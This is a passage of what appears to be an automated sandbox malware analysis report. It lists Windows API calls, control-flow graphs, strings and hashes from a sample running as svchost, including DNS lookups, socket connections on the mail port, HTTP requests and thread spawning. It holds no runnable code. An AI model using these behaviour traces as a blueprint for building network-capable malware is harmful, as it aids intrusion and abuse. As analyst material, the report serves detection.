                                                                                                                                                                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                                                                • API String ID: 1879448924-4022980321
                                                                                                                                                                                • Opcode ID: 538c471abf18d49cd56a807553f3338373a44b15654f65f96a6d8b675c0a5cd7
                                                                                                                                                                                • Instruction ID: ba6e887fbb9592532475eb507909b79395661962f88f6adccef41f01467c0698
                                                                                                                                                                                • Opcode Fuzzy Hash: 538c471abf18d49cd56a807553f3338373a44b15654f65f96a6d8b675c0a5cd7
                                                                                                                                                                                • Instruction Fuzzy Hash: 973166ABA403166BE61123798D84FAF364C9B172A5F1A0934FE75E30C2FF15E55281F2
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 745 13154ba7-13154bc9 call 13152a0e 748 13154c7d-13154c87 745->748 749 13154bcf-13154bde LoadLibraryA 745->749 750 13154d02-13154d0a 748->750 751 13154c89-13154c8f 748->751 752 13154be4-13154bf4 GetProcAddress 749->752 753 13154d5d 749->753 757 13154d3d-13154d4b call 13152a17 750->757 758 13154d0c-13154d15 call 13152a17 750->758 751->750 756 13154c91-13154caa call 13152a17 * 2 751->756 752->753 754 13154bfa-13154c3c call 131529a0 GetProcAddress call 131529a0 GetProcAddress call 131529a0 call 13152d51 752->754 755 13154d5f-13154d63 753->755 786 13154c3e-13154c48 call 13152265 754->786 787 13154c4b-13154c4f 754->787 756->750 775 13154cac-13154cae 756->775 757->753 769 13154d4d-13154d5b 757->769 758->757 770 13154d17-13154d1e 758->770 769->755 770->757 777 13154d20-13154d28 770->777 775->750 779 13154cb0-13154cb4 775->779 777->757 780 13154d2a-13154d33 call 13152a17 777->780 788 13154cb6-13154cc7 779->788 789 13154ccf-13154cdb call 13152d88 779->789 780->757 791 13154d35-13154d3a 780->791 786->787 787->748 793 13154c51-13154c67 GetProcAddress call 131529a0 787->793 788->789 798 13154cc9-13154ccd 788->798 799 13154cdd-13154ce7 call 13152265 789->799 800 13154cea-13154cee 789->800 791->757 793->748 803 13154c69-13154c78 GetProcAddress call 131529a0 793->803 798->750 798->789 799->800 805 13154cf0-13154cf7 800->805 806 13154cf9-13154d00 800->806 803->748 805->757 806->757
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,1468EFD8,131530EF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 13154BD4
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 13154BF0
                                                                                                                                                                                  • Part of subcall function 131529A0: TlsGetValue.KERNEL32(00000000,13152A15,00000000,13154BB5,00000000,00000000,00000314,?,?,?,1468EFD8,131530EF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529AD
                                                                                                                                                                                  • Part of subcall function 131529A0: TlsGetValue.KERNEL32(FFFFFFFF,?,?,?,1468EFD8,131530EF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529C4
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 13154C0D
                                                                                                                                                                                  • Part of subcall function 131529A0: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,1468EFD8,131530EF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529D9
                                                                                                                                                                                  • Part of subcall function 131529A0: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 131529F4
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 13154C22
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 13154C43
                                                                                                                                                                                  • Part of subcall function 13152265: _memset.LIBCMT ref: 131522F1
                                                                                                                                                                                  • Part of subcall function 13152265: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 1315230F
                                                                                                                                                                                  • Part of subcall function 13152265: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 13152319
                                                                                                                                                                                  • Part of subcall function 13152265: UnhandledExceptionFilter.KERNEL32(1468EFD8,?,?,00000000), ref: 13152323
                                                                                                                                                                                  • Part of subcall function 13152265: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 1315233E
                                                                                                                                                                                  • Part of subcall function 13152265: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 13152345
                                                                                                                                                                                  • Part of subcall function 13152A17: TlsGetValue.KERNEL32(00000000,13153CD0,1315290D,?,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?), ref: 13152A24
                                                                                                                                                                                  • Part of subcall function 13152A17: TlsGetValue.KERNEL32(FFFFFFFF,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?,?,?,131520C2,0000000E), ref: 13152A3B
                                                                                                                                                                                  • Part of subcall function 13152A17: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?,?,?,131520C2,0000000E), ref: 13152A50
                                                                                                                                                                                  • Part of subcall function 13152A17: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 13152A6B
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 13154C57
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 13154C6F
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 13154CE2
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerLibraryLoadPresentTerminate_memset
                                                                                                                                                                                • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                                                                                                                • API String ID: 2940365033-232180764
                                                                                                                                                                                • Opcode ID: a830648fd4a1c629fa61de16f53efe0184e96fd83ac8a7b94d59be71d99b3b09
                                                                                                                                                                                • Instruction ID: dfc8f3ba4fd6df9083975587692ee10c8c12e7847dc8dc8b3d2360d1c2bc46ca
                                                                                                                                                                                • Opcode Fuzzy Hash: a830648fd4a1c629fa61de16f53efe0184e96fd83ac8a7b94d59be71d99b3b09
                                                                                                                                                                                • Instruction Fuzzy Hash: 9841D376B40315ABCF159FB48D84D9E7BA8EF4A258F2A093EF124F3150DF30A5818B61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • IsBadReadPtr.KERNEL32(00000002,00000001,00000000,00000000), ref: 13143EEA
                                                                                                                                                                                • htons.WS2_32(00000035), ref: 13143F34
                                                                                                                                                                                • htons.WS2_32(00000035), ref: 13143F48
                                                                                                                                                                                • Sleep.KERNEL32(00000035,00000035,?,?,?,?,?,?,?,?,?,?,?,0000007C), ref: 13143F75
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: htons$ReadSleep
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 317343359-0
                                                                                                                                                                                • Opcode ID: 67bbd07f37d728d17bd3136ad27fab33a828b63025003985e07cb9abd8e94f71
                                                                                                                                                                                • Instruction ID: 0cc42a1c999a2f236a246cc9ba181085ba80ff9704f394df86cf8783f9710338
                                                                                                                                                                                • Opcode Fuzzy Hash: 67bbd07f37d728d17bd3136ad27fab33a828b63025003985e07cb9abd8e94f71
                                                                                                                                                                                • Instruction Fuzzy Hash: 19A1C175940289EFCB01CFA8CD84DDEBBB9AF55304F2980A9E944B7251DB31AE44CB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 869 1314e325-1314e34b GetTickCount 870 1314e352-1314e380 call 13144d0b htons 869->870 873 1314e383-1314e389 870->873 874 1314e3e9 873->874 875 1314e38b-1314e3b5 call 13142f79 DnsQuery_A 873->875 876 1314e3eb-1314e3f1 874->876 881 1314e3b7-1314e3db call 13144d0b DnsRecordListFree 875->881 882 1314e3e0-1314e3e7 875->882 879 1314e462-1314e46f 876->879 880 1314e3f3-1314e3f9 876->880 885 1314e471-1314e478 879->885 886 1314e48a-1314e4aa call 13142f79 call 131506ce 879->886 883 1314e457-1314e460 880->883 884 1314e3fb-1314e43f socket setsockopt connect 880->884 881->882 882->873 882->874 883->876 883->879 889 1314e451-1314e452 closesocket 884->889 890 1314e441-1314e44c recv 884->890 891 1314e479-1314e47b 885->891 886->870 898 1314e4b0-1314e4b6 886->898 889->883 890->889 894 1314e484-1314e488 891->894 895 1314e47d 891->895 894->886 894->891 895->894 898->870 899 1314e4bc-1314e4ca Sleep 898->899 899->898 900 1314e4cc 899->900 900->870
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314E337
                                                                                                                                                                                • htons.WS2_32(00000019), ref: 1314E377
                                                                                                                                                                                • DnsQuery_A.DNSAPI(-00000004,00000001,00000000,00000000,?,00000000), ref: 1314E3AE
                                                                                                                                                                                • DnsRecordListFree.DNSAPI(?,?), ref: 1314E3DB
                                                                                                                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 1314E401
                                                                                                                                                                                • setsockopt.WS2_32(00000000,0000FFFF,00001006,?,00000008), ref: 1314E423
                                                                                                                                                                                • connect.WS2_32(00000000,00000002,00000010), ref: 1314E438
                                                                                                                                                                                • recv.WS2_32(00000000,1468EA2E,00000064,00000000), ref: 1314E44C
                                                                                                                                                                                • closesocket.WS2_32(00000000), ref: 1314E452
                                                                                                                                                                                • Sleep.KERNEL32(000003E8,-00000004,00000048,00000000,00000019,?,?,00000000), ref: 1314E4C1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountFreeListQuery_RecordSleepTickclosesocketconnecthtonsrecvsetsockoptsocket
                                                                                                                                                                                • String ID: 0u
                                                                                                                                                                                • API String ID: 3184855960-3203441087
                                                                                                                                                                                • Opcode ID: 5e3bbd9f32d8cb5c1395d86b51e848201d7dfceb5d842d290c4f0f56be43b39e
                                                                                                                                                                                • Instruction ID: ca660788ef7710c26ad6ab459e92a38f3dc0e22cb3ccb5353065bbacda7dbb4b
                                                                                                                                                                                • Opcode Fuzzy Hash: 5e3bbd9f32d8cb5c1395d86b51e848201d7dfceb5d842d290c4f0f56be43b39e
                                                                                                                                                                                • Instruction Fuzzy Hash: 3E41E172944359BBEB12DBA8CC81AEEB77CFF15B08F180439F605B7180EB7469448B61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1116 1314ae51-1314ae59 1117 1314ae5f-1314ae62 1116->1117 1118 1314ae5b-1314ae5e 1116->1118 1117->1118 1119 1314ae64-1314ae67 1117->1119 1119->1118 1120 1314ae69-1314aea5 lstrlenA call 13144f9e 1119->1120 1123 1314aea7-1314aead lstrcatA 1120->1123 1124 1314aeaf-1314aee6 lstrcatA * 5 1120->1124 1123->1124
                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00000000,00000000,?,1314AF98,00000000,1314C1E9,?,00000000,00000000,?,00000000), ref: 1314AE79
                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,,,?,1314AF98,00000000,1314C1E9,?,00000000,00000000,?,00000000), ref: 1314AEAD
                                                                                                                                                                                • lstrcatA.KERNEL32(?,1314142C,?,1314AF98,00000000,1314C1E9,?,00000000,00000000,?,00000000), ref: 1314AEB7
                                                                                                                                                                                • lstrcatA.KERNEL32(?,?,?,1314AF98,00000000,1314C1E9,?,00000000,00000000,?,00000000), ref: 1314AEBF
                                                                                                                                                                                • lstrcatA.KERNEL32(?,13141428,?,1314AF98,00000000,1314C1E9,?,00000000,00000000,?,00000000), ref: 1314AEC9
                                                                                                                                                                                • lstrcatA.KERNEL32(?,00000000,?,1314AF98,00000000,1314C1E9,?,00000000,00000000,?,00000000), ref: 1314AED1
                                                                                                                                                                                • lstrcatA.KERNEL32(?,13141424,?,1314AF98,00000000,1314C1E9,?,00000000,00000000,?,00000000), ref: 1314AEDB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrcat$lstrlen
                                                                                                                                                                                • String ID: ,
                                                                                                                                                                                • API String ID: 751011610-1078660327
                                                                                                                                                                                • Opcode ID: 8d063c209c05f3c40b290d53618749aae86c4561cc527b284faf3af39faf7822
                                                                                                                                                                                • Instruction ID: 2d473fa946dc4316309682cf5bab062bba16a4a6af7baf30bbb2f6fcee6fc67c
                                                                                                                                                                                • Opcode Fuzzy Hash: 8d063c209c05f3c40b290d53618749aae86c4561cc527b284faf3af39faf7822
                                                                                                                                                                                • Instruction Fuzzy Hash: 2C114C36A0022EEFDF109F64ED408DB3FA5EF042A5B158036F818A6161EB31DD70DEA1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL,131569C8,0000000C,13152BC8,00000000,00000000,?,?,?,13152A61,?,13152F12,?,00000001,?,131523E7), ref: 13152AC8
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,EncodePointer), ref: 13152AFC
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,DecodePointer), ref: 13152B0C
                                                                                                                                                                                • InterlockedIncrement.KERNEL32(1315AD08), ref: 13152B2E
                                                                                                                                                                                • __lock.LIBCMT ref: 13152B36
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProc$HandleIncrementInterlockedModule__lock
                                                                                                                                                                                • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                                                                • API String ID: 3405995401-2843748187
                                                                                                                                                                                • Opcode ID: 29c2cd3d3dea595baed148f36d95434f1a2f5eed951343c799b98d5db5c70684
                                                                                                                                                                                • Instruction ID: bdd58697fcf6b0d5aa352136108c748b5c22594eda4f2e92f2ccc84a88215cd1
                                                                                                                                                                                • Opcode Fuzzy Hash: 29c2cd3d3dea595baed148f36d95434f1a2f5eed951343c799b98d5db5c70684
                                                                                                                                                                                • Instruction Fuzzy Hash: 56114C76A007029FE711AF79D840BEABBF0AF06315F104929F8B997651DB34A902CF61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • DeleteCriticalSection.KERNEL32(00000000,00000000,1314D277,00000000,-00000008,00000000,00000000,1314DFE7,00000000,00000000,76B7EA30,1314E1E5,00000000), ref: 13143428
                                                                                                                                                                                • DeleteCriticalSection.KERNEL32 ref: 13143438
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 13143449
                                                                                                                                                                                • OpenThread.KERNEL32(00000001,00000000,00000000), ref: 13143468
                                                                                                                                                                                • TerminateThread.KERNEL32(00000000,00000000), ref: 13143476
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1314347D
                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 13143488
                                                                                                                                                                                • ExitThread.KERNEL32 ref: 13143498
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 131434A1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Thread$CriticalDeleteExitSection$CloseCurrentHandleOpenProcessSleepTerminate
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3126711353-0
                                                                                                                                                                                • Opcode ID: 6574907d64a1d9367c674465d6f8eb0d2fac05f8a3635993c3481088b0551f84
                                                                                                                                                                                • Instruction ID: 37a31bfd6f88ac882e859ff3a5f913339fc59731e7e290309411a6c915f0fd73
                                                                                                                                                                                • Opcode Fuzzy Hash: 6574907d64a1d9367c674465d6f8eb0d2fac05f8a3635993c3481088b0551f84
                                                                                                                                                                                • Instruction Fuzzy Hash: 0101A2B1500278AFD309BFA2DEC899A7AA9FB0535CB194939F50693204C7784845CFF2
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 281148d3f13c85d1e5e5d8c5f199cb49ebcef382ed69331147877eb2d37db5b2
                                                                                                                                                                                • Instruction ID: 347a5177cc14affda91ebe3db16af19fc9b1fd4cae495389ec6fa93fff2853fc
                                                                                                                                                                                • Opcode Fuzzy Hash: 281148d3f13c85d1e5e5d8c5f199cb49ebcef382ed69331147877eb2d37db5b2
                                                                                                                                                                                • Instruction Fuzzy Hash: B841C971704316FBD7109B79CF40F6A3A5DDB817BCF784A25B821D51D4EB60E4428A61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountTick
                                                                                                                                                                                • String ID: L'
                                                                                                                                                                                • API String ID: 536389180-3089082269
                                                                                                                                                                                • Opcode ID: 8502b55dd1ecc48274e9aa1318abc4f64c3df78873fcfdff1fda3ff97be35a27
                                                                                                                                                                                • Instruction ID: 5ccda6dff719294e52dc9972e018d76e162f8bde6f1a59f0aee7bd834407432f
                                                                                                                                                                                • Opcode Fuzzy Hash: 8502b55dd1ecc48274e9aa1318abc4f64c3df78873fcfdff1fda3ff97be35a27
                                                                                                                                                                                • Instruction Fuzzy Hash: 38513075D00309FFCF10CF98C9848AEBBB9BB44364F35866AE569A7191D7309A81CF91
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • StrStrA.SHLWAPI(?,1314CF74,00000000,00000000,?,1314CF73,?), ref: 13151ACD
                                                                                                                                                                                • StrStrA.SHLWAPI(00000002,131414AC), ref: 13151BAE
                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 13151BC3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrlen
                                                                                                                                                                                • String ID: %$u
                                                                                                                                                                                • API String ID: 1659193697-272644364
                                                                                                                                                                                • Opcode ID: fbad5abb2e874c339c1d36cb4db215c37bc2f01017c3cd0755d4ce8c287bdbc7
                                                                                                                                                                                • Instruction ID: 3b30c20e63476d411fe8fff1dc5f307cf6bb43daa7a15507a0be19b988553535
                                                                                                                                                                                • Opcode Fuzzy Hash: fbad5abb2e874c339c1d36cb4db215c37bc2f01017c3cd0755d4ce8c287bdbc7
                                                                                                                                                                                • Instruction Fuzzy Hash: 5941C476E0024AAFDB12DF78CD849AEBBB9EF06244B194174F855E7201F734EA44CB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 13143206
                                                                                                                                                                                • CreateThread.KERNEL32(00000000,0000FA00,1314AC80,00000000,00000000,1315B698), ref: 1314322C
                                                                                                                                                                                • CreateThread.KERNEL32(00000000,0000FA00,1314E325,00000000,00000000,1315B684), ref: 13143247
                                                                                                                                                                                • Sleep.KERNEL32(000001F4,?,?,131433FF), ref: 13143259
                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 13143271
                                                                                                                                                                                • CreateThread.KERNEL32(00000000,0000FA00,1314609A,00000000,00000000,1315B688), ref: 1314328F
                                                                                                                                                                                • CreateThread.KERNEL32(00000000,0000FA00,13144898,00000000,00000000,1315B68C), ref: 131432A4
                                                                                                                                                                                • CreateThread.KERNEL32(00000000,0000FA00,1314CCD7,00000000,00000000,1315B694), ref: 131432B8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Thread$Create$Sleep$Current
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 773548574-0
                                                                                                                                                                                • Opcode ID: 485e2c268a206b43ffbfe4ffce24d5252f72a8d4056e7c0c36fab4777ce81126
                                                                                                                                                                                • Instruction ID: dd442d82ce1d7506068b13048ddc8b54df2e144e20bd1b72f1d0a51d7373427f
                                                                                                                                                                                • Opcode Fuzzy Hash: 485e2c268a206b43ffbfe4ffce24d5252f72a8d4056e7c0c36fab4777ce81126
                                                                                                                                                                                • Instruction Fuzzy Hash: 4D11E1F07813AA7FF6106B718CC4DB73AACEB8678AB204929F521A2086D7249C049970
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,131414A0,?,00000000,00000000,?,?), ref: 131504DE
                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,131414A0,00000000), ref: 13150515
                                                                                                                                                                                • StrStrA.SHLWAPI(00000001,131414A0), ref: 13150541
                                                                                                                                                                                • StrStrA.SHLWAPI(?,131414A0), ref: 13150574
                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,131413AC), ref: 1315058E
                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,1314149C), ref: 1315059A
                                                                                                                                                                                • wnsprintfA.SHLWAPI ref: 131505BF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wnsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 167729887-0
                                                                                                                                                                                • Opcode ID: 9777119513a1fcbf600301b3c42d007433eed3ddca439ccfbffba44267e20fe0
                                                                                                                                                                                • Instruction ID: 243af7390c0885436e9854db75e32d55ee869c31370201af5ee67116e9b61509
                                                                                                                                                                                • Opcode Fuzzy Hash: 9777119513a1fcbf600301b3c42d007433eed3ddca439ccfbffba44267e20fe0
                                                                                                                                                                                • Instruction Fuzzy Hash: 5C61AF75A01249FFDF114FA5CD40FAE3F6AAF87254F198029FC749A2A0CB31D941DA60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • getSystemCP.LIBCMT ref: 131544B8
                                                                                                                                                                                  • Part of subcall function 13154425: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 13154432
                                                                                                                                                                                  • Part of subcall function 13154425: GetOEMCP.KERNEL32(00000000), ref: 1315444C
                                                                                                                                                                                • setSBCS.LIBCMT ref: 131544CA
                                                                                                                                                                                  • Part of subcall function 13154120: _memset.LIBCMT ref: 13154133
                                                                                                                                                                                • IsValidCodePage.KERNEL32(-00000030), ref: 13154510
                                                                                                                                                                                • GetCPInfo.KERNEL32(00000000,?), ref: 13154523
                                                                                                                                                                                • _memset.LIBCMT ref: 1315453B
                                                                                                                                                                                • setSBUpLow.LIBCMT ref: 1315460E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2658552758-0
                                                                                                                                                                                • Opcode ID: af18a46d693f277a3becd28f6804c801e3623c72dd25ab6cf07ae02fca43cde2
                                                                                                                                                                                • Instruction ID: 5c1de8df099469ff0dda55c5d4dbde2984e7a614063db4ef8b63bf716e2067d3
                                                                                                                                                                                • Opcode Fuzzy Hash: af18a46d693f277a3becd28f6804c801e3623c72dd25ab6cf07ae02fca43cde2
                                                                                                                                                                                • Instruction Fuzzy Hash: EE51F531B842559BCF15CF69C5806AABBB5FF07301F19816AF8A2AF142DF38D446CB90
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 13145048
                                                                                                                                                                                • InternetConnectA.WININET(00000000,00000003,00000000,00000000,00000000,00000003,00000000,00000000), ref: 13145068
                                                                                                                                                                                • HttpOpenRequestA.WININET(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1314507D
                                                                                                                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 1314508E
                                                                                                                                                                                • HttpQueryInfoA.WININET(00000000,00000005,?,00000000), ref: 131450AB
                                                                                                                                                                                • InternetReadFile.WININET(00000000,00000000,0000000A,0000000A), ref: 131450E3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000015.00000002.687668064.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_21_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HttpInternet$OpenRequest$ConnectFileInfoQueryReadSend
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2757949531-0
                                                                                                                                                                                • Opcode ID: 22a331550de01ec2645564005e4bf32a19f9b79704b9f3f78d1406bbc28db17e
                                                                                                                                                                                • Instruction ID: 3e48ee776b3adc7c9bad0b04ab65395fd94d74b2f812049d15b6b2da66a3f4e7
                                                                                                                                                                                • Opcode Fuzzy Hash: 22a331550de01ec2645564005e4bf32a19f9b79704b9f3f78d1406bbc28db17e
                                                                                                                                                                                • Instruction Fuzzy Hash: 55211A7A601228FBCB219BA5CD88DDF7EBCEF46AA4B244465F505E2540E7748A00DAF0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
